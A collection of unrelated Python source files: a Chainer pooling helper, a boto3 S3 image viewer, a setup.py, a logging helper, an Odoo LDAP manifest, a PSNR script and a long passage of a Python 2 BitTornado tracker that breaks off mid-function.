    divided by sqrt of the window area (averaging shrinks magnitudes)."""
    data, t, lip = x
    lip = lip * factor(data.shape, ksize, stride, pad)
    kh, kw = to_tuple(ksize)
    lip = lip / math.sqrt(kh * kw)
    pooled = chainer.functions.average_pooling_2d(
        data, ksize=ksize, stride=stride, pad=pad)
    return pooled, t, lip
|
"""Boto3 S3 image file stream into memory to show via matplotlib without writing.
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import io
import boto3
# Fill in credentials and bucket details before running.
access_key = ''
access_secret = ''  # renamed from the misspelled `accrss_secret`
bucket_name = ''
region_name = ''
# S3 service resource for the target region.
client_s3 = boto3.resource(
    's3',
    aws_access_key_id=access_key,
    aws_secret_access_key=access_secret,
    region_name=region_name
)
bucket = client_s3.Bucket(bucket_name)
img_object = bucket.Object('fox/fox-wild-22.jpg')
# Download into an in-memory buffer instead of writing a file to disk.
file_stream = io.BytesIO()
img_object.download_fileobj(file_stream)
# Rewind: download_fileobj leaves the stream positioned at the end,
# and imread reads from the current position.
file_stream.seek(0)
img = mpimg.imread(file_stream, format='jpeg')
plt.imshow(img)
plt.show()
|
from setuptools import setup, find_packages
setup(
name='rigidsearch',
version='1.0.dev0',
url='http://github.com/getsentry/rigidsearch',
description='A simple web search API.',
license='BSD',
author='Sentry',
author_email='hello@getsentry.com',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=[
'click>=6.0',
'Flask',
'whoosh',
'html5lib<=0.9999999',
'lxml',
'cssselect',
'raven',
'blinker',
],
extras_require={
'server': ['gunicorn', 'gevent'],
'test': ['pytest'],
},
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
],
entry_points='''
[console_scripts]
rigidsearch=rigidsearch.cli:main
'''
)
|
import logging
def setup_logging(output_folder, out_file='log.txt'):
    """Configure root logging: DEBUG to a file in output_folder, INFO to the console."""
    log_path = '{}/{}'.format(output_folder, out_file)
    logging.basicConfig(
        level=logging.DEBUG,
        format='%(asctime)s - [%(name)s]: %(message)s',
        datefmt='%y-%m-%d %H:%M',
        filename=log_path,
        filemode='w'
    )
    # Mirror INFO-and-above messages to the console with a shorter format.
    console_handler = logging.StreamHandler()
    console_handler.setLevel(logging.INFO)
    console_handler.setFormatter(logging.Formatter('[%(name)s]: %(message)s'))
    logging.getLogger('').addHandler(console_handler)
def log_to_file(name, value):
    """Log *value* at INFO level through the logger named *name*."""
    logging.getLogger(name).info(value)


if __name__ == '__main__':
    pass
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# Odoo addon manifest for the LDAP authentication module.
{
    'name': 'Authentication via LDAP',
    'depends': ['base', 'base_setup'],
    #'description': < auto-loaded from README file
    'category': 'Hidden/Tools',
    'data': [
        'views/ldap_installer_views.xml',
        'security/ir.model.access.csv',
        'views/res_config_settings_views.xml',
    ],
    # Requires the python-ldap package to be installed on the host.
    'external_dependencies': {
        'python': ['ldap'],
    }
}
|
from compute_PSNR_UP import cal_pnsr, cal_pnsr_all
import imageio
# Compare one estimated (super-resolved) texture against its ground truth.
#img_sr = imageio.imread('/scratch/yawli/ColMapMiddlebury/TempleRing/x2/GeometryIterativeProcess_WeightedRegularized/iteration_0000/Pass003_0.00001/EstimatedTextures/Texture006.png')
#img_sr = imageio.imread('/scratch/yawli/ColMapMiddlebury/TempleRing/x4/GeometryIterativeProcess_WeightedRegularized/iteration_0000/Pass001_0.00100/EstimatedTextures/Texture017.png')
img_sr = imageio.imread('/scratch/yawli/ColMapMiddlebury/TempleRing/x4/GeometryIterativeProcess_WeightedRegularized/iteration_0000/Pass003_0.00001/EstimatedTextures/Texture067.png')
img_hr=imageio.imread('/scratch/yawli/ColMapMiddlebury/TempleRing/x1/WeightedBilaplacian_TV_Blender/Pass001_0.00100/EstimatedTextures/Texture000.png')
# NOTE(review): cal_pnsr is imported but unused; cal_pnsr_all returns (psnr_y, psnr).
psnr_y, psnr = cal_pnsr_all(img_hr, img_sr)
print(psnr)
|
# -*- coding: utf-8 -*-
"""This package contains each component."""
|
# Written by Bram Cohen
# see LICENSE.txt for license information
from herd.BitTornado.parseargs import parseargs, formatDefinitions
from herd.BitTornado.RawServer import RawServer, autodetect_ipv6, autodetect_socket_style
from herd.BitTornado.HTTPHandler import HTTPHandler, months, weekdays
from herd.BitTornado.parsedir import parsedir
from NatCheck import NatCheck
from T2T import T2TList
from herd.BitTornado.subnetparse import IP_List, ipv6_to_ipv4, to_ipv4, is_valid_ip, is_ipv4
from herd.BitTornado.iprangeparse import IP_List as IP_Range_List
from herd.BitTornado.torrentlistparse import parsetorrentlist
from threading import Event, Thread
from herd.BitTornado.bencode import bencode, bdecode, Bencached
from herd.BitTornado.zurllib import urlopen, quote, unquote
from Filter import Filter
from urlparse import urlparse
from os import rename, getpid
from os.path import exists, isfile
from cStringIO import StringIO
from traceback import print_exc
from time import time, gmtime, strftime, localtime
from herd.BitTornado.clock import clock
from random import shuffle, seed, randrange
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from types import StringType, IntType, LongType, ListType, DictType
from binascii import b2a_hex, a2b_hex, a2b_base64
from string import lower
import sys, os
import signal
import re
import herd.BitTornado.__init__
from herd.BitTornado.__init__ import version, createPeerID
# Pre-Python-2.2.1 compatibility: define True/False when the names are missing.
try:
    True
except:
    True = 1
    False = 0
# (option name, default value, help text) triples consumed by parseargs and
# rendered into the usage message by formatDefinitions.
defaults = [
    ('port', 8998, "Port to listen on."),
    ('dfile', None, 'file to store recent downloader info in'),
    ('bind', '', 'comma-separated list of ips/hostnames to bind to locally'),
#    ('ipv6_enabled', autodetect_ipv6(),
    ('ipv6_enabled', 0,
         'allow the client to connect to peers via IPv6'),
    ('ipv6_binds_v4', autodetect_socket_style(),
        'set if an IPv6 server socket will also field IPv4 connections'),
    ('socket_timeout', 15, 'timeout for closing connections'),
    ('save_dfile_interval', 5 * 60, 'seconds between saving dfile'),
    ('timeout_downloaders_interval', 2 * 60, 'seconds between expiring downloaders'),
    ('reannounce_interval', 15, 'seconds downloaders should wait between reannouncements'),
    ('response_size', 500, 'number of peers to send in an info message'),
    ('timeout_check_interval', 5,
        'time to wait between checking if any connections have timed out'),
    ('nat_check', 0,
        "how many times to check if a downloader is behind a NAT (0 = don't check)"),
    ('log_nat_checks', 0,
        "whether to add entries to the log for nat-check results"),
    ('min_time_between_log_flushes', 3.0,
        'minimum time it must have been since the last flush to do another one'),
    ('min_time_between_cache_refreshes', 600.0,
        'minimum time in seconds before a cache is considered stale and is flushed'),
    ('allowed_dir', '', 'only allow downloads for .torrents in this dir'),
    ('allowed_list', '', 'only allow downloads for hashes in this list (hex format, one per line)'),
    ('allowed_controls', 0, 'allow special keys in torrents in the allowed_dir to affect tracker access'),
    ('multitracker_enabled', 0, 'whether to enable multitracker operation'),
    ('multitracker_allowed', 'autodetect', 'whether to allow incoming tracker announces (can be none, autodetect or all)'),
    ('multitracker_reannounce_interval', 2 * 60, 'seconds between outgoing tracker announces'),
    ('multitracker_maxpeers', 20, 'number of peers to get in a tracker announce'),
    ('aggregate_forward', '', 'format: <url>[,<password>] - if set, forwards all non-multitracker to this url with this optional password'),
    ('aggregator', '0', 'whether to act as a data aggregator rather than a tracker. If enabled, may be 1, or <password>; ' +
             'if password is set, then an incoming password is required for access'),
    ('hupmonitor', 0, 'whether to reopen the log file upon receipt of HUP signal'),
    ('http_timeout', 60,
        'number of seconds to wait before assuming that an http connection has timed out'),
    ('parse_dir_interval', 60, 'seconds between reloading of allowed_dir or allowed_file ' +
             'and allowed_ips and banned_ips lists'),
    ('show_infopage', 1, "whether to display an info page when the tracker's root dir is loaded"),
    ('infopage_redirect', '', 'a URL to redirect the info page to'),
    ('show_names', 1, 'whether to display names from allowed dir'),
    ('favicon', '', 'file containing x-icon data to return when browser requests favicon.ico'),
    ('allowed_ips', '', 'only allow connections from IPs specified in the given file; '+
             'file contains subnet data in the format: aa.bb.cc.dd/len'),
    ('banned_ips', '', "don't allow connections from IPs specified in the given file; "+
             'file contains IP range data in the format: xxx:xxx:ip1-ip2'),
    ('only_local_override_ip', 2, "ignore the ip GET parameter from machines which aren't on local network IPs " +
             "(0 = never, 1 = always, 2 = ignore if NAT checking is not enabled)"),
    ('logfile', '', 'file to write the tracker logs, use - for stdout (default)'),
    ('allow_get', 0, 'use with allowed_dir; adds a /file?hash={hash} url that allows users to download the torrent file'),
    ('keep_dead', 0, 'keep dead torrents after they expire (so they still show up on your /scrape and web page)'),
    ('scrape_allowed', 'full', 'scrape access allowed (can be none, specific or full)'),
    ('dedicated_seed_id', '', 'allows tracker to monitor dedicated seed(s) and flag torrents as seeded'),
  ]
def statefiletemplate(x):
    """Validate the structure of a loaded tracker state dict.

    Raises ValueError on any malformed entry; returns None when the state
    is well-formed. Checks the 'peers', 'completed', 'allowed' and
    'allowed_dir_files' sections described by the inline comments below.
    """
    if type(x) != DictType:
        raise ValueError
    for cname, cinfo in x.items():
        if cname == 'peers':
            for y in cinfo.values():      # The 'peers' key is a dictionary of SHA hashes (torrent ids)
                if type(y) != DictType:   # ... for the active torrents, and each is a dictionary
                    raise ValueError
                for id, info in y.items(): # ... of client ids interested in that torrent
                    if (len(id) != 20):
                        raise ValueError
                    if type(info) != DictType:  # ... each of which is also a dictionary
                        raise ValueError # ... which has an IP, a Port, and a Bytes Left count for that client for that torrent
                    if type(info.get('ip', '')) != StringType:
                        raise ValueError
                    port = info.get('port')
                    if type(port) not in (IntType,LongType) or port < 0:
                        raise ValueError
                    left = info.get('left')
                    if type(left) not in (IntType,LongType) or left < 0:
                        raise ValueError
        elif cname == 'completed':
            if (type(cinfo) != DictType): # The 'completed' key is a dictionary of SHA hashes (torrent ids)
                raise ValueError          # ... for keeping track of the total completions per torrent
            for y in cinfo.values():      # ... each torrent has an integer value
                if type(y) not in (IntType,LongType):
                    raise ValueError      # ... for the number of reported completions for that torrent
        elif cname == 'allowed':
            if (type(cinfo) != DictType): # a list of info_hashes and included data
                raise ValueError
            if x.has_key('allowed_dir_files'):
                adlist = [z[1] for z in x['allowed_dir_files'].values()]
                for y in cinfo.keys():    # and each should have a corresponding key here
                    if not y in adlist:
                        raise ValueError
        elif cname == 'allowed_dir_files':
            if (type(cinfo) != DictType): # a list of files, their attributes and info hashes
                raise ValueError
            dirkeys = {}
            for y in cinfo.values():      # each entry should have a corresponding info_hash
                if not y[1]:
                    continue
                if not x['allowed'].has_key(y[1]):
                    raise ValueError
                if dirkeys.has_key(y[1]): # and each should have a unique info_hash
                    raise ValueError
                dirkeys[y[1]] = 1
# Message returned for requests about torrents this tracker does not know.
alas = 'your file may exist elsewhere in the universe\nbut alas, not here\n'
# Intranet/loopback address set, used to recognize proxied or local clients.
local_IPs = IP_List()
local_IPs.set_intranet_addresses()
def isotime(secs = None):
    """Return secs (a Unix timestamp; default: now) as 'YYYY-MM-DD HH:MM UTC'."""
    if secs is None:  # identity check is the correct idiom; '== None' can misfire on odd __eq__
        secs = time()
    return strftime('%Y-%m-%d %H:%M UTC', gmtime(secs))
# Matches the trailing "for <ip>" that some proxies append to the Via header.
http_via_filter = re.compile(' for ([0-9.]+)\Z')
def _get_forwarded_ip(headers):
    """Extract the proxied client address from common proxy headers, or None."""
    # Try the common proxy headers in rough order of reliability.
    header = headers.get('x-forwarded-for')
    if header:
        try:
            # NOTE(review): assumes exactly one comma ("client, proxy"); a chain
            # with two or more proxies raises here and returns the raw header.
            x,y = header.split(',')
        except:
            return header
        # Prefer the first hop unless it is invalid or a private/local address.
        if is_valid_ip(x) and not local_IPs.includes(x):
            return x
        return y
    header = headers.get('client-ip')
    if header:
        return header
    header = headers.get('via')
    if header:
        x = http_via_filter.search(header)
        try:
            return x.group(1)
        except:
            pass
    header = headers.get('from')
    #if header:
    #    return header
    #return None
    return header
def get_forwarded_ip(headers):
    """Return the proxied client IP from headers, or None if absent, invalid or local."""
    candidate = _get_forwarded_ip(headers)
    if is_valid_ip(candidate) and not local_IPs.includes(candidate):
        return candidate
    return None
def compact_peer_info(ip, port):
    """Encode ip:port in the 6-byte compact peer format (4 address chars + 2 port chars).

    Returns '' when ip is not a dotted-quad address (e.g. a domain name).
    """
    try:
        octets = [chr(int(part)) for part in ip.split('.')]
        packed = ''.join(octets) + chr((port & 0xFF00) >> 8) + chr(port & 0xFF)
        if len(packed) != 6:
            raise ValueError
    except:
        packed = ''  # not a valid IP, must be a domain name
    return packed
class Tracker:
def __init__(self, config, rawserver):
self.config = config
self.response_size = config['response_size']
self.dfile = config['dfile']
self.natcheck = config['nat_check']
favicon = config['favicon']
self.parse_dir_interval = config['parse_dir_interval']
self.favicon = None
if favicon:
try:
h = open(favicon,'r')
self.favicon = h.read()
h.close()
except:
print "**warning** specified favicon file -- %s -- does not exist." % favicon
self.rawserver = rawserver
self.cached = {} # format: infohash: [[time1, l1, s1], [time2, l2, s2], [time3, l3, s3]]
self.cached_t = {} # format: infohash: [time, cache]
self.times = {}
self.state = {}
self.seedcount = {}
self.allowed_IPs = None
self.banned_IPs = None
if config['allowed_ips'] or config['banned_ips']:
self.allowed_ip_mtime = 0
self.banned_ip_mtime = 0
self.read_ip_lists()
self.only_local_override_ip = config['only_local_override_ip']
if self.only_local_override_ip == 2:
self.only_local_override_ip = not config['nat_check']
if exists(self.dfile):
try:
h = open(self.dfile, 'rb')
ds = h.read()
h.close()
tempstate = bdecode(ds)
if not tempstate.has_key('peers'):
tempstate = {'peers': tempstate}
statefiletemplate(tempstate)
self.state = tempstate
except:
print '**warning** statefile '+self.dfile+' corrupt; resetting'
self.downloads = self.state.setdefault('peers', {})
self.completed = self.state.setdefault('completed', {})
self.becache = {} # format: infohash: [[l1, s1], [l2, s2], [l3, s3]]
for infohash, ds in self.downloads.items():
self.seedcount[infohash] = 0
for x,y in ds.items():
ip = y['ip']
if ( (self.allowed_IPs and not self.allowed_IPs.includes(ip))
or (self.banned_IPs and self.banned_IPs.includes(ip)) ):
del ds[x]
continue
if not y['left']:
self.seedcount[infohash] += 1
if y.get('nat',-1):
continue
gip = y.get('given_ip')
if is_valid_ip(gip) and (
not self.only_local_override_ip or local_IPs.includes(ip) ):
ip = gip
self.natcheckOK(infohash,x,ip,y['port'],y['left'])
for x in self.downloads.keys():
self.times[x] = {}
for y in self.downloads[x].keys():
self.times[x][y] = 0
self.trackerid = createPeerID('-T-')
seed(self.trackerid)
self.reannounce_interval = config['reannounce_interval']
self.save_dfile_interval = config['save_dfile_interval']
self.show_names = config['show_names']
rawserver.add_task(self.save_state, self.save_dfile_interval)
self.prevtime = clock()
self.timeout_downloaders_interval = config['timeout_downloaders_interval']
rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval)
self.logfile = None
self.log = None
if (config['logfile']) and (config['logfile'] != '-'):
try:
self.logfile = config['logfile']
self.log = open(self.logfile,'a')
sys.stdout = self.log
print "# Log Started: ", isotime()
except:
print "**warning** could not redirect stdout to log file: ", sys.exc_info()[0]
if config['hupmonitor']:
def huphandler(signum, frame, self = self):
try:
self.log.close ()
self.log = open(self.logfile,'a')
sys.stdout = self.log
print "# Log reopened: ", isotime()
except:
print "**warning** could not reopen logfile"
signal.signal(signal.SIGHUP, huphandler)
self.allow_get = config['allow_get']
self.t2tlist = T2TList(config['multitracker_enabled'], self.trackerid,
config['multitracker_reannounce_interval'],
config['multitracker_maxpeers'], config['http_timeout'],
self.rawserver)
if config['allowed_list']:
if config['allowed_dir']:
print '**warning** allowed_dir and allowed_list options cannot be used together'
print '**warning** disregarding allowed_dir'
config['allowed_dir'] = ''
self.allowed = self.state.setdefault('allowed_list',{})
self.allowed_list_mtime = 0
self.parse_allowed()
self.remove_from_state('allowed','allowed_dir_files')
if config['multitracker_allowed'] == 'autodetect':
config['multitracker_allowed'] = 'none'
config['allowed_controls'] = 0
elif config['allowed_dir']:
self.allowed = self.state.setdefault('allowed',{})
self.allowed_dir_files = self.state.setdefault('allowed_dir_files',{})
self.allowed_dir_blocked = {}
self.parse_allowed()
self.remove_from_state('allowed_list')
else:
self.allowed = None
self.remove_from_state('allowed','allowed_dir_files', 'allowed_list')
if config['multitracker_allowed'] == 'autodetect':
config['multitracker_allowed'] = 'none'
config['allowed_controls'] = 0
self.uq_broken = unquote('+') != ' '
self.keep_dead = config['keep_dead']
self.Filter = Filter(rawserver.add_task)
aggregator = config['aggregator']
if aggregator == '0':
self.is_aggregator = False
self.aggregator_key = None
else:
self.is_aggregator = True
if aggregator == '1':
self.aggregator_key = None
else:
self.aggregator_key = aggregator
self.natcheck = False
send = config['aggregate_forward']
if not send:
self.aggregate_forward = None
else:
try:
self.aggregate_forward, self.aggregate_password = send.split(',')
except:
self.aggregate_forward = send
self.aggregate_password = None
self.dedicated_seed_id = config['dedicated_seed_id']
self.is_seeded = {}
self.cachetime = 0
self.cachetimeupdate()
def cachetimeupdate(self):
self.cachetime += 1 # raw clock, but more efficient for cache
self.rawserver.add_task(self.cachetimeupdate,1)
def aggregate_senddata(self, query):
url = self.aggregate_forward+'?'+query
if self.aggregate_password is not None:
url += '&password='+self.aggregate_password
rq = Thread(target = self._aggregate_senddata, args = [url])
rq.setDaemon(False)
rq.start()
def _aggregate_senddata(self, url): # just send, don't attempt to error check,
try: # discard any returned data
h = urlopen(url)
h.read()
h.close()
except:
return
def get_infopage(self):
try:
if not self.config['show_infopage']:
return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
red = self.config['infopage_redirect']
if red:
return (302, 'Found', {'Content-Type': 'text/html', 'Location': red},
'<A HREF="'+red+'">Click Here</A>')
s = StringIO()
s.write('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">\n' \
'<html><head><title>BitTorrent download info</title>\n')
if self.favicon is not None:
s.write('<link rel="shortcut icon" href="/favicon.ico">\n')
s.write('</head>\n<body>\n' \
'<h3>BitTorrent download info</h3>\n'\
'<ul>\n'
'<li><strong>tracker version:</strong> %s</li>\n' \
'<li><strong>server time:</strong> %s</li>\n' \
'</ul>\n' % (version, isotime()))
if self.config['allowed_dir']:
if self.show_names:
names = [ (self.allowed[hash]['name'],hash)
for hash in self.allowed.keys() ]
else:
names = [ (None,hash)
for hash in self.allowed.keys() ]
else:
names = [ (None,hash) for hash in self.downloads.keys() ]
if not names:
s.write('<p>not tracking any files yet...</p>\n')
else:
names.sort()
tn = 0
tc = 0
td = 0
tt = 0 # Total transferred
ts = 0 # Total size
nf = 0 # Number of files displayed
if self.config['allowed_dir'] and self.show_names:
s.write('<table summary="files" border="1">\n' \
'<tr><th>info hash</th><th>torrent name</th><th align="right">size</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th><th align="right">transferred</th></tr>\n')
else:
s.write('<table summary="files">\n' \
'<tr><th>info hash</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th></tr>\n')
for name,hash in names:
l = self.downloads[hash]
n = self.completed.get(hash, 0)
tn = tn + n
c = self.seedcount[hash]
tc = tc + c
d = len(l) - c
td = td + d
if self.config['allowed_dir'] and self.show_names:
if self.allowed.has_key(hash):
nf = nf + 1
sz = self.allowed[hash]['length'] # size
ts = ts + sz
szt = sz * n # Transferred for this torrent
tt = tt + szt
if self.allow_get == 1:
linkname = '<a href="/file?info_hash=' + quote(hash) + '">' + name + '</a>'
else:
linkname = name
s.write('<tr><td><code>%s</code></td><td>%s</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td><td align="right">%s</td></tr>\n' \
% (b2a_hex(hash), linkname, size_format(sz), c, d, n, size_format(szt)))
else:
s.write('<tr><td><code>%s</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td></tr>\n' \
% (b2a_hex(hash), c, d, n))
ttn = 0
for i in self.completed.values():
ttn = ttn + i
if self.config['allowed_dir'] and self.show_names:
s.write('<tr><td align="right" colspan="2">%i files</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i/%i</td><td align="right">%s</td></tr>\n'
% (nf, size_format(ts), tc, td, tn, ttn, size_format(tt)))
else:
s.write('<tr><td align="right">%i files</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i/%i</td></tr>\n'
% (nf, tc, td, tn, ttn))
s.write('</table>\n' \
'<ul>\n' \
'<li><em>info hash:</em> SHA1 hash of the "info" section of the metainfo (*.torrent)</li>\n' \
'<li><em>complete:</em> number of connected clients with the complete file</li>\n' \
'<li><em>downloading:</em> number of connected clients still downloading</li>\n' \
'<li><em>downloaded:</em> reported complete downloads (total: current/all)</li>\n' \
'<li><em>transferred:</em> torrent size * total downloaded (does not include partial transfers)</li>\n' \
'</ul>\n')
s.write('</body>\n' \
'</html>\n')
return (200, 'OK', {'Content-Type': 'text/html; charset=iso-8859-1'}, s.getvalue())
except:
print_exc()
return (500, 'Internal Server Error', {'Content-Type': 'text/html; charset=iso-8859-1'}, 'Server Error')
def scrapedata(self, hash, return_name = True):
l = self.downloads[hash]
n = self.completed.get(hash, 0)
c = self.seedcount[hash]
d = len(l) - c
f = {'complete': c, 'incomplete': d, 'downloaded': n}
if return_name and self.show_names and self.config['allowed_dir']:
f['name'] = self.allowed[hash]['name']
return (f)
def get_scrape(self, paramslist):
    """Answer a /scrape request.

    With 'info_hash' parameters, scrape only those torrents (requires
    scrape_allowed in ('specific', 'full')); without parameters, scrape
    every known torrent (requires scrape_allowed == 'full').

    :param paramslist: dict of query parameter name -> list of values
    :return: (status, reason, headers, bencoded body) HTTP response tuple
    """
    fs = {}
    if paramslist.has_key('info_hash'):
        # per-torrent scrape
        if self.config['scrape_allowed'] not in ['specific', 'full']:
            return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                bencode({'failure reason':
                'specific scrape function is not available with this tracker.'}))
        for hash in paramslist['info_hash']:
            # only report torrents this tracker actually tracks
            if self.allowed is not None:
                if self.allowed.has_key(hash):
                    fs[hash] = self.scrapedata(hash)
            else:
                if self.downloads.has_key(hash):
                    fs[hash] = self.scrapedata(hash)
    else:
        # full scrape of everything we track
        if self.config['scrape_allowed'] != 'full':
            return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                bencode({'failure reason':
                'full scrape function is not available with this tracker.'}))
        if self.allowed is not None:
            keys = self.allowed.keys()
        else:
            keys = self.downloads.keys()
        for hash in keys:
            fs[hash] = self.scrapedata(hash)
    return (200, 'OK', {'Content-Type': 'text/plain'}, bencode({'files': fs}))
def get_file(self, hash):
    """Serve the .torrent metainfo file for *hash* as a download.

    :param hash: info hash of an allowed torrent
    :return: HTTP response tuple; 400 when downloads are disabled,
        404 when the hash is unknown
    """
    if not self.allow_get:
        return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
            'get function is not available with this tracker.')
    if not self.allowed.has_key(hash):
        return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
    fname = self.allowed[hash]['file']
    fpath = self.allowed[hash]['path']
    # NOTE(review): file handle is not explicitly closed (relies on refcounting)
    return (200, 'OK', {'Content-Type': 'application/x-bittorrent',
        'Content-Disposition': 'attachment; filename=' + fname},
        open(fpath, 'rb').read())
def check_allowed(self, infohash, paramslist):
    """Validate that an announce for *infohash* is permitted.

    Checks, in order: aggregator password, allowed-torrent list,
    per-torrent 'failure reason' controls, and multitracker rules.

    :return: a full HTTP response tuple describing the refusal, or
        None when the announce is allowed to proceed
    """
    if ( self.aggregator_key is not None
            and not ( paramslist.has_key('password')
                      and paramslist['password'][0] == self.aggregator_key ) ):
        # aggregator mode requires the shared password on every announce
        return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
            bencode({'failure reason':
            'Requested download is not authorized for use with this tracker.'}))
    if self.allowed is not None:
        if not self.allowed.has_key(infohash):
            return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                bencode({'failure reason':
                'Requested download is not authorized for use with this tracker.'}))
        if self.config['allowed_controls']:
            # a torrent-level control file may veto announces explicitly
            if self.allowed[infohash].has_key('failure reason'):
                return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                    bencode({'failure reason': self.allowed[infohash]['failure reason']}))
    if paramslist.has_key('tracker'):
        # announce relayed from another tracker in a multitracker setup
        if ( self.config['multitracker_allowed'] == 'none' or       # turned off
             paramslist['peer_id'][0] == self.trackerid ):          # oops! contacted myself
            return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                bencode({'failure reason': 'disallowed'}))
        if ( self.config['multitracker_allowed'] == 'autodetect'
                and not self.allowed[infohash].has_key('announce-list') ):
            return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
                bencode({'failure reason':
                'Requested download is not authorized for multitracker use.'}))
    return None
def add_data(self, infohash, event, ip, paramslist):
    """Record an announce from one peer and update tracker state.

    Validates the announce parameters, then creates/updates/deletes the
    peer record for this torrent, keeping seed counts, completion counts
    and the bencoded response caches (becache) in sync, and scheduling a
    NAT connect-back check when needed.

    :param infohash: torrent being announced
    :param event: 'started' / 'completed' / 'stopped' / 'snooped' / None
    :param ip: source IP of the request
    :param paramslist: dict of query parameter name -> list of values
    :return: rsize, the number of peers to return to this client
    :raises ValueError: on malformed announce parameters
    """
    peers = self.downloads.setdefault(infohash, {})
    ts = self.times.setdefault(infohash, {})
    self.completed.setdefault(infohash, 0)
    self.seedcount.setdefault(infohash, 0)

    def params(key, default = None, l = paramslist):
        # first value of a query parameter, or default
        if l.has_key(key):
            return l[key][0]
        return default

    # --- validate the announce ---
    myid = params('peer_id','')
    if len(myid) != 20:
        raise ValueError, 'id not of length 20'
    if event not in ['started', 'completed', 'stopped', 'snooped', None]:
        raise ValueError, 'invalid event'
    port = long(params('port',''))
    if port < 0 or port > 65535:
        raise ValueError, 'invalid port'
    left = long(params('left',''))
    if left < 0:
        raise ValueError, 'invalid amount left'
    uploaded = long(params('uploaded',''))
    downloaded = long(params('downloaded',''))

    peer = peers.get(myid)
    islocal = local_IPs.includes(ip)
    mykey = params('key')
    if peer:
        # an update is only authorized when the key or source IP matches
        auth = peer.get('key',-1) == mykey or peer.get('ip') == ip

    gip = params('ip')   # IP the peer claims for itself
    if is_valid_ip(gip) and (islocal or not self.only_local_override_ip):
        ip1 = gip
    else:
        ip1 = ip

    if params('numwant') is not None:
        rsize = min(int(params('numwant')),self.response_size)
    else:
        rsize = self.response_size

    if event == 'stopped':
        if peer:
            if auth:
                self.delete_peer(infohash,myid)
    elif not peer:
        # --- brand-new peer record ---
        ts[myid] = clock()
        peer = {'ip': ip, 'port': port, 'left': left}
        if mykey:
            peer['key'] = mykey
        if gip:
            peer['given ip'] = gip
        if port:
            if not self.natcheck or islocal:
                peer['nat'] = 0
                self.natcheckOK(infohash,myid,ip1,port,left)
            else:
                NatCheck(self.connectback_result,infohash,myid,ip1,port,self.rawserver)
        else:
            # no usable port: mark as effectively unreachable
            peer['nat'] = 2**30
        if event == 'completed':
            self.completed[infohash] += 1
        if not left:
            self.seedcount[infohash] += 1
        peers[myid] = peer
    else:
        # --- update to an existing peer record ---
        if not auth:
            return rsize    # return w/o changing stats
        ts[myid] = clock()
        if not left and peer['left']:
            # peer just became a seed: move it between becache buckets
            self.completed[infohash] += 1
            self.seedcount[infohash] += 1
            if not peer.get('nat', -1):
                for bc in self.becache[infohash]:
                    bc[1][myid] = bc[0][myid]
                    del bc[0][myid]
        elif left and not peer['left']:
            # peer reverted from seed to leecher
            self.completed[infohash] -= 1
            self.seedcount[infohash] -= 1
            if not peer.get('nat', -1):
                for bc in self.becache[infohash]:
                    bc[0][myid] = bc[1][myid]
                    del bc[1][myid]
        peer['left'] = left
        if port:
            recheck = False
            if ip != peer['ip']:
                peer['ip'] = ip
                recheck = True
            if gip != peer.get('given ip'):
                if gip:
                    peer['given ip'] = gip
                elif peer.has_key('given ip'):
                    del peer['given ip']
                recheck = True
            natted = peer.get('nat', -1)
            if recheck:
                # contact info changed: drop cached entries and NAT status
                if natted == 0:
                    l = self.becache[infohash]
                    y = not peer['left']
                    for x in l:
                        del x[y][myid]
                if natted >= 0:
                    del peer['nat'] # restart NAT testing
            if natted and natted < self.natcheck:
                # previous checks failed but retries remain
                recheck = True
            if recheck:
                if not self.natcheck or islocal:
                    peer['nat'] = 0
                    self.natcheckOK(infohash,myid,ip1,port,left)
                else:
                    NatCheck(self.connectback_result,infohash,myid,ip1,port,self.rawserver)
    return rsize
def peerlist(self, infohash, stopped, tracker, is_seed, return_type, rsize):
    """Build the announce response for one request.

    Draws peers from pre-bencoded caches (becache) that are periodically
    reshuffled, so repeated announces hand out different peers cheaply.

    :param infohash: torrent being announced
    :param stopped: True when the client sent event=stopped
    :param tracker: truthy for a multitracker peer-exchange request
    :param is_seed: True when the requester reports nothing left
    :param return_type: 0 = full dicts, 1 = no peer ids, 2 = compact strings
    :param rsize: number of peers requested
    :return: dict with 'complete', 'incomplete', 'interval', 'peers', ...
    """
    data = {}    # return data
    seeds = self.seedcount[infohash]
    data['complete'] = seeds
    data['incomplete'] = len(self.downloads[infohash]) - seeds

    if ( self.config['allowed_controls']
            and self.allowed[infohash].has_key('warning message') ):
        data['warning message'] = self.allowed[infohash]['warning message']

    if tracker:
        # multitracker path: serve from the tracker-to-tracker cache
        data['interval'] = self.config['multitracker_reannounce_interval']
        if not rsize:
            return data
        cache = self.cached_t.setdefault(infohash, None)
